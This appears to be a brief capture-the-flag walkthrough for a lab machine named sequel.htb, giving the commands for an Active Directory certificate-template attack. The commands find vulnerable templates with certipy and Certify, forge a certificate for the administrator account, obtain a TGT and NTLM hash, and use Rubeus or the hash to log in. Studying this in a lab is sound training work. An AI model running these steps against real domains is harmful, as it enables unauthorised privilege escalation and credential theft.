Administrator
Exploit without a shell
View vulnerable certificates
certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerableForge a new certificate
certipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn [email protected] -ca sequel-DC-CA -template UserAuthenticationGet the TGT and NTLM hash
certipy-ad auth -pfx administrator.pfx Exploit via shell on machine
.\Certify.exe find /vulnerable

We are requesting a ticket for our user but saying that our user is the administrator

Port 5986 (winrm) is open
Move the Private key contents to a key.pem file and the Public key to a key.cert file
Port 5986 is closed
Put certificate contents into a cert.pem file and convert to pfx
Upload Rubeus and newly made cert.pfx

We can either use the ticket to login or the NTLM hash


Last updated
Was this helpful?